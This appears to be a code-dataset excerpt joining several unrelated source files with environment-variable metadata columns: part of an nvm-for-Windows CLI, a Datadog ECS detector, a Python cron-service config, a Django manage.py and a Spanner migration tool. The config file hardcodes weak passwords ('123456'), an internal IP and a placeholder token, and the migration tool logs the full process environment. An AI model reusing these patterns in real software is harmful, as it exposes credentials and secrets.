fmt.Println("\nInvalid list option.\n\nPlease use on of the following\n - nvm list\n - nvm list installed\n - nvm list available")
help()
return
}
if listtype == "installed" {
fmt.Println("")
inuse, a := node.GetCurrentVersion()
v := node.GetInstalled(env.root)
for i := 0; i < len(v); i++ {
version := v[i]
isnode, _ := regexp.MatchString("v",version)
str := ""
if isnode {
if "v"+inuse == version {
str = str+" * "
} else {
str = str+" "
}
str = str+regexp.MustCompile("v").ReplaceAllString(version,"")
if "v"+inuse == version {
str = str+" (Currently using "+a+"-bit executable)"
// str = ansi.Color(str,"green:black")
}
fmt.Printf(str+"\n")
}
}
if len(v) == 0 {
fmt.Println("No installations recognized.")
}
} else {
_, lts, current, stable, unstable, _ := node.GetAvailable()
releases := 20
data := make([][]string, releases, releases + 5)
for i := 0; i < releases; i++ {
release := make([]string, 4, 6)
release[0] = ""
release[1] = ""
release[2] = ""
release[3] = ""
if len(current) > i {
if len(current[i]) > 0 {
release[0] = current[i]
}
}
if len(lts) > i {
if len(lts[i]) > 0 {
release[1] = lts[i]
}
}
if len(stable) > i {
if len(stable[i]) > 0 {
release[2] = stable[i]
}
}
if len(unstable) > i {
if len(unstable[i]) > 0 {
release[3] = unstable[i]
}
}
data[i] = release
}
fmt.Println("")
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{" Current ", " LTS ", " Old Stable ", "Old Unstable"})
table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false})
table.SetAlignment(tablewriter.ALIGN_CENTER)
table.SetCenterSeparator("|")
table.AppendBulk(data) // Add Bulk Data
table.Render()
fmt.Println("\nThis is a partial list. For a complete list, visit https://nodejs.org/download/release")
}
}
func enable() {
dir := ""
files, _ := ioutil.ReadDir(env.root)
for _, f := range files {
if f.IsDir() {
isnode, _ := regexp.MatchString("v",f.Name())
if isnode {
dir = f.Name()
}
}
}
fmt.Println("nvm enabled")
if dir != "" {
use(strings.Trim(regexp.MustCompile("v").ReplaceAllString(dir,"")," \n\r"),env.arch)
} else {
fmt.Println("No versions of node.js found. Try installing the latest by typing nvm install latest")
}
}
func disable() {
if !runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink))) {
return
}
fmt.Println("nvm disabled")
}
func help() {
fmt.Println("\nRunning version "+NvmVersion+".")
fmt.Println("\nUsage:")
fmt.Println(" ")
fmt.Println(" nvm arch : Show if node is running in 32 or 64 bit mode.")
fmt.Println(" nvm install <version> [arch] : The version can be a node.js version or \"latest\" for the latest stable version.")
fmt.Println(" Optionally specify whether to install the 32 or 64 bit version (defaults to system arch).")
fmt.Println(" Set [arch] to \"all\" to install 32 AND 64 bit versions.")
fmt.Println(" Add --insecure to the end of this command to bypass SSL validation of the remote download server.")
fmt.Println(" nvm list [available] : List the node.js installations. Type \"available\" at the end to see what can be installed. Aliased as ls.")
fmt.Println(" nvm on : Enable node.js version management.")
fmt.Println(" nvm off : Disable node.js version management.")
fmt.Println(" nvm proxy [url] : Set a proxy to use for downloads. Leave [url] blank to see the current proxy.")
fmt.Println(" Set [url] to \"none\" to remove the proxy.")
fmt.Println(" nvm node_mirror [url] : Set the node mirror. Defaults to https://nodejs.org/dist/. Leave [url] blank to use default url.")
fmt.Println(" nvm npm_mirror [url] : Set the npm mirror. Defaults to https://github.com/npm/cli/archive/. Leave [url] blank to default url.")
fmt.Println(" nvm uninstall <version> : The version must be a specific version.")
// fmt.Println(" nvm update : Automatically update nvm to the latest version.")
fmt.Println(" nvm use [version] [arch] : Switch to use the specified version. Optionally specify 32/64bit architecture.")
fmt.Println(" nvm use <arch> will continue using the selected version, but switch to 32/64 bit mode.")
fmt.Println(" nvm root [path] : Set the directory where nvm should store different versions of node.js.")
fmt.Println(" If <path> is not set, the current root will be displayed.")
fmt.Println(" nvm version : Displays the current running version of nvm for Windows. Aliased as v.")
fmt.Println(" ")
}
// ===============================================================
// END | CLI functions
// ===============================================================
// ===============================================================
// BEGIN | Utility functions
// ===============================================================
func checkVersionExceedsLatest(version string) bool{
//content := web.GetRemoteTextFile("http://nodejs.org/dist/latest/SHASUMS256.txt")
url := web.GetFullNodeUrl("latest/SHASUMS256.txt");
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
latest := reg.ReplaceAllString(re.FindString(content),"")
var vArr = strings.Split(version,".")
var lArr = strings.Split(latest, ".")
for index := range lArr {
lat,_ := strconv.Atoi(lArr[index])
ver,_ := strconv.Atoi(vArr[index])
//Should check for valid input (checking for conversion errors) but this tool is made to trust the user
if ver < lat {
return false
} else if ver > lat {
return true
}
}
return false
}
func cleanVersion(version string) string {
re := regexp.MustCompile("\\d+.\\d+.\\d+")
matched := re.FindString(version)
if len(matched) == 0 {
re = regexp.MustCompile("\\d+.\\d+")
matched = re.FindString(version)
if len(matched) == 0 {
matched = version + ".0.0"
} else {
matched = matched + ".0"
}
fmt.Println(matched)
}
return matched
}
// Given a node.js version, returns the associated npm version
func getNpmVersion(nodeversion string) string {
_, _, _, _, _, npm := node.GetAvailable()
return npm[nodeversion]
}
func updateRootDir(path string) {
_, err := os.Stat(path)
if err != nil {
fmt.Println(path+" does not exist or could not be found.")
return
}
currentRoot := env.root
env.root = filepath.Clean(path)
// Copy command files
os.Link(filepath.Clean(currentRoot + "/elevate.cmd"), filepath.Clean(env.root + "/elevate.cmd"))
os.Link(filepath.Clean(currentRoot + "/elevate.cmd"), filepath.Clean(env.root + "/elevate.vbs"))
saveSettings()
if currentRoot != env.root {
fmt.Println("\nRoot has been changed from " + currentRoot + " to " + path)
}
}
func runElevated(command string) bool {
c := exec.Command("cmd") // dummy executable that actually needs to exist but we'll overwrite using .SysProcAttr
// Based on the official docs, syscall.SysProcAttr.CmdLine doesn't exist.
// But it does and is vital:
// https://github.com/golang/go/issues/15566#issuecomment-333274825
// https://medium.com/@felixge/killing-a-child-process-and-all-of-its-children-in-go-54079af94773
c.SysProcAttr = &syscall.SysProcAttr{CmdLine: command}
var stderr bytes.Buffer
c.Stderr = &stderr
err := c.Run()
if err != nil {
fmt.Println(fmt.Sprint(err) + ": " + stderr.String())
return false
}
return true
}
func saveSettings() {
content := "root: " + strings.Trim(env.root, " \n\r") + "\r\narch: " + strings.Trim(env.arch, " \n\r") + "\r\nproxy: " + strings.Trim(env.proxy, " \n\r") + "\r\noriginalpath: " + strings.Trim(env.originalpath, " \n\r") + "\r\noriginalversion: " + strings.Trim(env.originalversion, " \n\r")
content = content + "\r\nnode_mirror: " + strings.Trim(env.node_mirror, " \n\r") + "\r\nnpm_mirror: " + strings.Trim(env.npm_mirror, " \n\r")
ioutil.WriteFile(env.settings, []byte(content), 0644)
}
// NOT USED?
/*
func useArchitecture(a string) {
if strings.ContainsAny("32",os.Getenv("PROCESSOR_ARCHITECTURE")) {
fmt.Println("This computer only supports 32-bit processing.")
return
}
if a == "32" || a == "64" {
env.arch = a
saveSettings()
fmt.Println("Set to "+a+"-bit mode")
} else {
fmt.Println("Cannot set architecture to "+a+". Must be 32 or 64 are acceptable values.")
}
}
*/
// ===============================================================
// END | Utility functions
// ===============================================================
func setup() {
lines, err := file.ReadLines(env.settings)
if err != nil {
fmt.Println("\nERROR",err)
os.Exit(1)
}
// Process each line and extract the value
for _, line := range lines {
line = strings.Trim(line, " \r\n")
if strings.HasPrefix(line, "root:") {
env.root = filepath.Clean(strings.TrimSpace(regexp.MustCompile("^root:").ReplaceAllString(line, "")))
} else if strings.HasPrefix(line, "originalpath:") {
env.originalpath = filepath.Clean(strings.TrimSpace(regexp.MustCompile("^originalpath:").ReplaceAllString(line, "")))
} else if strings.HasPrefix(line, "originalversion:") {
env.originalversion = strings.TrimSpace(regexp.MustCompile("^originalversion:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "arch:") {
env.arch = strings.TrimSpace(regexp.MustCompile("^arch:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "node_mirror:") {
env.node_mirror = strings.TrimSpace(regexp.MustCompile("^node_mirror:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "npm_mirror:") {
env.npm_mirror = strings.TrimSpace(regexp.MustCompile("^npm_mirror:").ReplaceAllString(line, ""))
} else if strings.HasPrefix(line, "proxy:") {
env.proxy = strings.TrimSpace(regexp.MustCompile("^proxy:").ReplaceAllString(line, ""))
if env.proxy != "none" && env.proxy != "" {
if strings.ToLower(env.proxy[0:4]) != "http" {
env.proxy = "http://"+env.proxy
}
web.SetProxy(env.proxy, env.verifyssl)
}
}
}
web.SetMirrors(env.node_mirror, env.npm_mirror)
env.arch = arch.Validate(env.arch)
// Make sure the directories exist
_, e := os.Stat(env.root)
if e != nil {
fmt.Println(env.root+" could not be found or does not exist. Exiting.")
return
}
}
| [
"\"NVM_HOME\"",
"\"NVM_SYMLINK\"",
"\"PROCESSOR_ARCHITECTURE\"",
"\"PROCESSOR_ARCHITECTURE\"",
"\"PROCESSOR_ARCHITECTURE\""
]
| []
| [
"NVM_SYMLINK",
"NVM_HOME",
"PROCESSOR_ARCHITECTURE"
]
| [] | ["NVM_SYMLINK", "NVM_HOME", "PROCESSOR_ARCHITECTURE"] | go | 3 | 0 | |
pkg/util/ecs/detection.go | // Unless explicitly stated otherwise all files in this repository are licensed
// under the Apache License Version 2.0.
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2016-2020 Datadog, Inc.
// +build docker
package ecs
import (
"os"
"time"
"github.com/DataDog/datadog-agent/pkg/util/cache"
ecsmeta "github.com/DataDog/datadog-agent/pkg/util/ecs/metadata"
"github.com/DataDog/datadog-agent/pkg/util/log"
)
const (
isFargateInstanceCacheKey = "IsFargateInstanceCacheKey"
hasFargateResourceTagsCacheKey = "HasFargateResourceTagsCacheKey"
hasEC2ResourceTagsCacheKey = "HasEC2ResourceTagsCacheKey"
// CloudProviderName contains the inventory name of for ECS
CloudProviderName = "AWS"
)
// IsECSInstance returns whether the agent is running in ECS.
func IsECSInstance() bool {
_, err := ecsmeta.V1()
return err == nil
}
// IsFargateInstance returns whether the agent is in an ECS fargate task.
// It detects it by getting and unmarshalling the metadata API response.
func IsFargateInstance() bool {
return queryCacheBool(isFargateInstanceCacheKey, func() (bool, time.Duration) {
// This envvar is set to AWS_ECS_EC2 on classic EC2 instances
// Versions 1.0.0 to 1.3.0 (latest at the time) of the Fargate
// platform set this envvar.
// If Fargate detection were to fail, running a container with
// `env` as cmd will allow to check if it is still present.
if os.Getenv("AWS_EXECUTION_ENV") != "AWS_ECS_FARGATE" {
return newBoolEntry(false)
}
_, err := ecsmeta.V2().GetTask()
if err != nil {
log.Debug(err)
return newBoolEntry(false)
}
return newBoolEntry(true)
})
}
// IsRunningOn returns true if the agent is running on ECS/Fargate
func IsRunningOn() bool {
return IsECSInstance() || IsFargateInstance()
}
// HasEC2ResourceTags returns whether the metadata endpoint in ECS exposes
// resource tags.
func HasEC2ResourceTags() bool {
return queryCacheBool(hasEC2ResourceTagsCacheKey, func() (bool, time.Duration) {
client, err := ecsmeta.V3FromCurrentTask()
if err != nil {
return newBoolEntry(false)
}
_, err = client.GetTaskWithTags()
return newBoolEntry(err == nil)
})
}
// HasFargateResourceTags returns whether the metadata endpoint in Fargate
// exposes resource tags.
func HasFargateResourceTags() bool {
return queryCacheBool(hasFargateResourceTagsCacheKey, func() (bool, time.Duration) {
_, err := ecsmeta.V2().GetTaskWithTags()
return newBoolEntry(err == nil)
})
}
func queryCacheBool(cacheKey string, cacheMissEvalFunc func() (bool, time.Duration)) bool {
if cachedValue, found := cache.Cache.Get(cacheKey); found {
if v, ok := cachedValue.(bool); ok {
return v
}
log.Errorf("Invalid cache format for key %q: forcing a cache miss", cacheKey)
}
newValue, ttl := cacheMissEvalFunc()
cache.Cache.Set(cacheKey, newValue, ttl)
return newValue
}
func newBoolEntry(v bool) (bool, time.Duration) {
if v == true {
return v, 5 * time.Minute
}
return v, cache.NoExpiration
}
| [
"\"AWS_EXECUTION_ENV\""
]
| []
| [
"AWS_EXECUTION_ENV"
]
| [] | ["AWS_EXECUTION_ENV"] | go | 1 | 0 | |
notecron/center/config.py | import os
from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
from notedata.work import WorkApp
app = WorkApp('notecron')
app.create()
basedir = app.dir_common # os.path.abspath(os.path.dirname(__file__))
#redis_host = '192.168.3.122'
login_password = '123456'
logs_path = app.dir_log
cron_db_url = 'sqlite:///'+app.db_file('cron.sqlite')
#cron_db_url = 'sqlite:////root/workspace/notechats/notecron/notecron/temp/cron.sqlite'
#cron_db_url = 'sqlite:///'+os.path.abspath(os.path.dirname(__file__))+'/cron.sqlite'
cron_job_log_db_url = 'sqlite:///'+app.db_file('db.sqlite')
#cron_job_log_db_url = 'sqlite:////root/workspace/notechats/notecron/notecron/temp/db.sqlite'
#cron_job_log_db_url = 'sqlite:///'+os.path.abspath(os.path.dirname(__file__))+'/db.sqlite'
def get_config():
data = {
'is_single': 0,
'redis_host': '192.168.3.122',
'redis_pwd': '123456',
'redis_db': 1,
'cron_db_url': cron_db_url,
'cron_job_log_db_url': cron_job_log_db_url,
'redis_port': 6379,
'login_pwd': login_password,
'error_notice_api_key': 123456,
'job_log_counts': 1000,
'api_access_token': 'abcdedf',
'error_keyword': 'fail'
}
return data
def get_config_value(key):
data = {
'is_single': 0,
'redis_host': '192.168.3.122',
'redis_pwd': '123456',
'redis_db': 1,
'cron_db_url': cron_db_url,
'cron_job_log_db_url': cron_job_log_db_url,
'redis_port': 6379,
'login_pwd': login_password,
'error_notice_api_key': 123456,
'job_log_counts': 1000,
'api_access_token': 'abcdedf',
'error_keyword': 'fail'
}
return data[key]
class Config:
JSON_AS_ASCII = False
JSONIFY_PRETTYPRINT_REGULAR = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
SQLALCHEMY_COMMIT_ON_TEARDOWN = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
SCHEDULER_API_ENABLED = False
CRON_DB_URL = cron_db_url
LOGIN_PWD = login_password
BASEDIR = basedir
LOGDIR = logs_path
SCHEDULER_JOBSTORES = {
'default': SQLAlchemyJobStore(url=cron_db_url)
}
SCHEDULER_EXECUTORS = {
'default': {
'type': 'threadpool',
'max_workers': 30
}
}
# 'misfire_grace_time':30
SCHEDULER_JOB_DEFAULTS = {
'coalesce': False,
'max_instances': 20,
'misfire_grace_time': 50
}
JOBS = [
{
'id': 'cron_check',
'func': 'notecron.center.pages.crons:cron_check',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*',
'minute': '*/30'
},
{
'id': 'cron_del_job_log',
'func': 'notecron.center.pages.crons:cron_del_job_log',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*/8'
},
{
'id': 'cron_check_db_sleep',
'func': 'notecron.center.pages.crons:cron_check_db_sleep',
'args': None,
'replace_existing': True,
'trigger': 'cron',
'day_of_week': "*",
'day': '*',
'hour': '*',
'minute': '*/10',
}
]
@staticmethod
def init_app(app):
if not os.path.exists(logs_path):
os.mkdir(logs_path)
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = cron_job_log_db_url
class ProductionConfig(Config):
DEBUG = False
SQLALCHEMY_DATABASE_URI = cron_job_log_db_url
config = {
'development': DevelopmentConfig,
'testing': DevelopmentConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
config_dict = {
'development': DevelopmentConfig,
'testing': DevelopmentConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| []
| []
| [
"SECRET_KEY"
]
| [] | ["SECRET_KEY"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'desafio.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
spanner-migrations/migratex.go | package main
//revive:disable:deep-exit
import (
"bytes"
"context"
"crypto/rand"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"runtime"
"sort"
"strconv"
"strings"
"syscall"
"time"
"unicode"
"cloud.google.com/go/spanner"
database "cloud.google.com/go/spanner/admin/database/apiv1"
"google.golang.org/api/iterator"
adminpb "google.golang.org/genproto/googleapis/spanner/admin/database/v1"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
)
type Severity int
const (
red = 31
green = 32
yellow = 33
cyan = 36
colorDebug = green
colorInfo = cyan
colorWarn = yellow
colorError = red
colorFatal = red
SeverityDebug = iota
SeverityInfo = iota
SeverityNotice = iota
SeverityWarning = iota
SeverityError = iota
SeverityEmergency = iota
)
var (
l *logger
envId string
gcpProjectId string
spannerInstanceId string
spannerDatabaseId string
timeout int
)
func init() {
l = newDefaultLogger(true)
flag.StringVar(&envId, "env_id", "", "The environment ID of the spanner instance")
flag.StringVar(&gcpProjectId, "gcp_project_id", "", "The GCP project ID of the spanner instance")
flag.StringVar(&spannerInstanceId, "spanner_instance_id", "", "The ID of the spanner instance")
flag.StringVar(&spannerDatabaseId, "spanner_database_id", "", "The ID of the spanner database")
flag.IntVar(&timeout, "timeout", 60, "The timeout in minutes")
flag.Parse()
}
func main() {
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Minute)
defer cancel()
logDebug(fmt.Sprintf("Starting in env: %v", map[string][]string{"os.Environ()": os.Environ()}))
logDebug(fmt.Sprintf("Checking args"))
if err := checkArgs(); err != nil {
logFatal(fmt.Sprintf("Failed checking required command line arguments: %v", err))
}
logDebug(fmt.Sprintf("Checked args"))
databseConnection := fmt.Sprintf("projects/%s/instances/%s/databases/%s", gcpProjectId, spannerInstanceId, spannerDatabaseId)
logDebug(fmt.Sprintf("Using envId=%q, gcpProjectId=%q, spannerInstanceId=%q, spannerDatabaseId=%q, databseConnection=%q, timeout=%d", envId, gcpProjectId, spannerInstanceId, spannerDatabaseId, databseConnection, timeout))
workingDir, err := os.Getwd()
if err != nil {
logFatal(fmt.Sprintf("Failed determining working directory: %v", err))
}
logDebug(fmt.Sprintf("Determined working directory %q", workingDir))
logInfo("Beginning migration")
ddl, dml := determineMigrations(workingDir)
if len(ddl) == 0 && len(dml) == 0 {
logInfo(fmt.Sprintf("No migrations found"))
return
}
if len(dml) == 0 {
logInfo(fmt.Sprintf("No DML migrations found, will apply all DDL migrations..."))
applyAllDdlMigrations(workingDir)
return
}
logInfo("DDL and DML migrations found, will determine if any are outstanding...")
spannerClient, spannerAdminClient := newSpannerClient(ctx, databseConnection)
defer spannerClient.Close()
defer spannerAdminClient.Close()
cleanUpAndExitOnInterrupt([]Closable{spannerClient})
logInfo(fmt.Sprintf("Determining last DDL migration..."))
createMigrationTableIfNecessary(ctx, spannerAdminClient, databseConnection, "SchemaMigrations")
dirty, lastDdlMigration := determineLastMigration(ctx, spannerClient, "SchemaMigrations")
if dirty {
logFatal(fmt.Sprintf("SchemaMigrations table is dirty, this must be manually fixed before more migrations can be applied"))
}
logInfo(fmt.Sprintf("Determining last DML migration..."))
createMigrationTableIfNecessary(ctx, spannerAdminClient, databseConnection, "DataMigrations")
dirty, lastDmlMigration := determineLastMigration(ctx, spannerClient, "DataMigrations")
if dirty {
logFatal(fmt.Sprintf("DataMigrations table is dirty, this must be manually fixed before more migrations can be applied"))
}
outstandingDdlMigrations, outstandingDmlMigrations := outstandingMigrations(ddl, dml, lastDdlMigration, lastDmlMigration)
if len(outstandingDdlMigrations)+len(outstandingDmlMigrations) == 0 {
logInfo(fmt.Sprintf("No outstanding migrations found"))
return
}
if len(outstandingDmlMigrations) == 0 {
logInfo(fmt.Sprintf("No outstanding DML migrations found, will apply all DDL migrations..."))
applyAllDdlMigrations(workingDir)
return
}
logInfo("Outstanding DDL and DML migrations found, will apply all interleaved...")
applyAllMigrations(ctx, spannerClient, workingDir, lastDmlMigration, outstandingDdlMigrations, outstandingDmlMigrations)
logInfo("Finished migration")
}
func checkArgs() error {
if envId == "" {
return errors.New("Missing command line argument `env_id`")
} else if gcpProjectId == "" {
return errors.New("Missing command line argument `gcp_project_id`")
} else if spannerInstanceId == "" {
return errors.New("Missing command line argument `spanner_instance_id`")
} else if spannerDatabaseId == "" {
return errors.New("Missing command line argument `spanner_database_id`")
}
return nil
}
func determineMigrations(dir string) (ddl []string, dml []string) {
logInfo(fmt.Sprintf("Determining migrations..."))
files, err := ioutil.ReadDir(dir)
if err != nil {
logFatal(fmt.Sprintf("Failed reading files in directory %q: %v", dir, err))
}
if len(files) == 0 {
logDebug(fmt.Sprintf("Found no files in directory %q", dir))
}
for _, v := range files {
logDebug(fmt.Sprintf("Found file %q", v.Name()))
if strings.HasSuffix(v.Name(), ".ddl.up.sql") {
ddl = append(ddl, v.Name())
} else if strings.HasSuffix(v.Name(), ".all.dml.sql") {
dml = append(dml, v.Name())
} else if strings.HasSuffix(v.Name(), fmt.Sprintf(".%s.dml.sql", envId)) {
dml = append(dml, v.Name())
} else if strings.HasSuffix(v.Name(), ".dml.sql") && strings.Contains(v.Name(), fmt.Sprintf(".%s.", envId)) {
dml = append(dml, v.Name())
}
}
logInfo(fmt.Sprintf("Found '%d' DDL migrations: %v", len(ddl), ddl))
logInfo(fmt.Sprintf("Found '%d' DML migrations: %v", len(dml), dml))
return
}
func applyAllDdlMigrations(dir string) {
cmd := exec.Command("migrate", "-path", dir, "-database", fmt.Sprintf("spanner://projects/%s/instances/%s/databases/%s?x-clean-statements=true", gcpProjectId, spannerInstanceId, spannerDatabaseId), "up")
var outb, errb bytes.Buffer
cmd.Stdout = &outb
cmd.Stderr = &errb
logInfo(fmt.Sprintf("Applying all DDL migrations: %v", cmd.Args))
if err := cmd.Run(); err != nil {
logFatal(fmt.Sprintf("Failed applying all DDL migrations Stdout=%q, Stderr=%q: %v", outb.String(), errb.String(), err))
}
logInfo(fmt.Sprintf("Finished applying all DDL migrations Stdout=%q, Stderr=%q", outb.String(), errb.String()))
}
func applyNextDdlMigration(dir string) {
cmd := exec.Command("migrate", "-path", dir, "-database", fmt.Sprintf("spanner://projects/%s/instances/%s/databases/%s?x-clean-statements=true", gcpProjectId, spannerInstanceId, spannerDatabaseId), "up", "1")
var outb, errb bytes.Buffer
cmd.Stdout = &outb
cmd.Stderr = &errb
logInfo(fmt.Sprintf("Applying next DDL migration: %v", cmd.Args))
if err := cmd.Run(); err != nil {
logFatal(fmt.Sprintf("Failed applying next DDL migration Stdout=%q, Stderr=%q: %v", outb.String(), errb.String(), err))
}
logInfo(fmt.Sprintf("Finished applying next DDL migration Stdout=%q, Stderr=%q", outb.String(), errb.String()))
}
func determineLastMigration(ctx context.Context, spannerClient *spanner.Client, migrationTableName string) (bool, int64) {
stmt := spanner.Statement{SQL: fmt.Sprintf("SELECT Dirty, Version FROM %s ORDER BY Version DESC LIMIT 1", migrationTableName)}
iter := spannerClient.Single().Query(ctx, stmt)
defer iter.Stop()
for {
row, err := iter.Next()
if err == iterator.Done {
logInfo(fmt.Sprintf("No existing migrations found in table %q: %v", migrationTableName, err))
return false, 0
}
if err != nil {
logFatal(fmt.Sprintf("Failed determining last migration in table %q: %v", migrationTableName, err))
}
var dirty bool
var version int64
if err := row.Columns(&dirty, &version); err != nil {
logFatal(fmt.Sprintf("Failed determining last migration in table %q, could not unpack columns: %v", migrationTableName, err))
}
logInfo(fmt.Sprintf("Last migration in table %q: '%d'", migrationTableName, version))
return dirty, version
}
}
func outstandingMigrations(availableDdlMigrations, availableDmlMigrations []string, lastDdlMigration, lastDmlMigration int64) (ddl []string, dml []string) {
logInfo(fmt.Sprintf("Determining outstanding DDL and DML migrations..."))
for _, v := range availableDdlMigrations {
if version, err := strconv.ParseInt(strings.Split(v, "_")[0], 10, 64); err == nil {
if version > lastDdlMigration {
if version < lastDmlMigration {
logFatal(fmt.Sprintf("Found inconsistent migration state. Outstanding DDL migration %q should have already been applied since it comes before the current DML migration version '%d'", v, lastDmlMigration))
}
ddl = append(ddl, v)
}
} else {
logFatal(fmt.Sprintf("Failed determining DDL migration version from file name %q: %v", v, err))
}
}
for _, v := range availableDmlMigrations {
if version, err := strconv.ParseInt(strings.Split(v, "_")[0], 10, 64); err == nil {
if version > lastDmlMigration {
if version < lastDdlMigration {
logFatal(fmt.Sprintf("Found inconsistent migration state. Outstanding DML migration %q should have already been applied since it comes before the current DDL migration version '%d'", v, lastDdlMigration))
}
dml = append(dml, v)
}
} else {
logFatal(fmt.Sprintf("Failed determining DML migration version from file name %q: %v", v, err))
}
}
logInfo(fmt.Sprintf("Found '%d' outstanding DDL migrations: %v", len(ddl), ddl))
logInfo(fmt.Sprintf("Found '%d' outstanding DML migrations: %v", len(dml), dml))
return
}
func createMigrationTableIfNecessary(ctx context.Context, spannerAdminClient *database.DatabaseAdminClient, databseConnection, migrationTableName string) {
logInfo(fmt.Sprintf("Creating table %q if necessary...", migrationTableName))
op, err := spannerAdminClient.UpdateDatabaseDdl(ctx, &adminpb.UpdateDatabaseDdlRequest{
Database: databseConnection,
Statements: []string{
fmt.Sprintf("CREATE TABLE %s (Version INT64 NOT NULL, Dirty BOOL NOT NULL) PRIMARY KEY (Version)", migrationTableName),
},
})
if err != nil {
logFatal(fmt.Sprintf("Failed creating the %q table: %v", migrationTableName, err))
}
if err := op.Wait(ctx); err != nil {
logDebug(fmt.Sprintf("DDL request returned code=%q, desc=%q", grpc.Code(err), grpc.ErrorDesc(err)))
if grpc.Code(err) == codes.FailedPrecondition && strings.Contains(grpc.ErrorDesc(err), "Duplicate name in schema") && strings.Contains(grpc.ErrorDesc(err), migrationTableName) {
logDebug(fmt.Sprintf("%q table already exists", migrationTableName))
return
}
logFatal(fmt.Sprintf("Failed creating the %q table after waiting: %v", migrationTableName, err))
}
}
func applyAllMigrations(ctx context.Context, spannerClient *spanner.Client, dir string, currentDmlMigrationVersion int64, outstandingDdlMigrations, outstandingDmlMigrations []string) {
logInfo(fmt.Sprintf("Applying all migrations..."))
outstandingMigrations := append(outstandingDdlMigrations, outstandingDmlMigrations...)
sort.Strings(outstandingMigrations)
logInfo(fmt.Sprintf("Applying '%d' outstanding migrations: %v", len(outstandingMigrations), outstandingMigrations))
for _, v := range outstandingMigrations {
logDebug(fmt.Sprintf("Applying outstanding migration %q where current DML migration version is '%d'", v, currentDmlMigrationVersion))
if strings.HasSuffix(v, ".ddl.up.sql") {
applyNextDdlMigration(dir)
} else if strings.HasSuffix(v, ".all.dml.sql") {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
} else if strings.HasSuffix(v, fmt.Sprintf(".%s.dml.sql", envId)) {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
} else if strings.HasSuffix(v, ".dml.sql") && strings.Contains(v, fmt.Sprintf(".%s.", envId)) {
currentDmlMigrationVersion = applyDmlMigration(ctx, spannerClient, dir, currentDmlMigrationVersion, v)
}
}
}
func applyDmlMigration(ctx context.Context, spannerClient *spanner.Client, dir string, currentDmlMigrationVersion int64, migration string) int64 {
logInfo(fmt.Sprintf("Appyling next DML migration %q from directory %q", migration, dir))
var nextDmlMigrationVersion int64
var err error
if nextDmlMigrationVersion, err = strconv.ParseInt(strings.Split(migration, "_")[0], 10, 64); err != nil {
logFatal(fmt.Sprintf("Failed determining next DML migration version from file name %q: %v", migration, err))
}
f := fmt.Sprintf("%s/%s", dir, migration)
fileBytes, err := ioutil.ReadFile(f)
if err != nil {
logFatal(fmt.Sprintf("Failed reading DML migration file %q: %v", f, err))
}
migrationFileString := string(fileBytes)
migrationData := make(map[string]string)
tf := fmt.Sprintf("%s/%s", dir, strings.TrimSuffix(migration, ".sql")+".json")
if _, err := os.Stat(tf); os.IsNotExist(err) {
logDebug(fmt.Sprintf("No migration data file %q for DML migration file %q", tf, f))
} else {
fileBytes, err := ioutil.ReadFile(tf)
if err != nil {
logFatal(fmt.Sprintf("Failed reading DML migration data file %q: %v", tf, err))
}
if err := json.Unmarshal(fileBytes, &migrationData); err != nil {
logFatal(fmt.Sprintf("Failed unpacking DML migration data file %q into json: %v", tf, err))
}
}
if len(migrationData) > 0 {
for k, v := range migrationData {
migrationFileString = strings.ReplaceAll(migrationFileString, fmt.Sprintf("@%s@", k), v)
}
}
setDataMigrationsDirty(ctx, spannerClient, nextDmlMigrationVersion)
var statements []spanner.Statement
for _, v := range strings.Split(migrationFileString, ";") {
v = replaceWhiteSpaceWithSpace(strings.TrimSpace(v)) + ";"
if v != ";" {
statements = append(statements, spanner.Statement{SQL: v})
logDebug(fmt.Sprintf("-> Created statement from SQL %q", v))
}
}
statements = append(statements, spanner.Statement{
SQL: "UPDATE DataMigrations SET Dirty=@dirty WHERE Version=@version",
Params: map[string]interface{}{
"dirty": false,
"version": nextDmlMigrationVersion,
},
})
if currentDmlMigrationVersion > 0 {
logInfo(fmt.Sprintf("Prior DML migration version '%d' will be deleted from DML migration tracking table 'DataMigrations'", currentDmlMigrationVersion))
statements = append(statements, spanner.Statement{
SQL: "DELETE FROM DataMigrations WHERE Version=@version",
Params: map[string]interface{}{
"version": currentDmlMigrationVersion,
},
})
} else {
logInfo("No prior DML migration versions need to be deleted from DML migration tracking table 'DataMigrations'")
}
applyDmlStatements(ctx, spannerClient, currentDmlMigrationVersion, nextDmlMigrationVersion, statements)
return nextDmlMigrationVersion
}
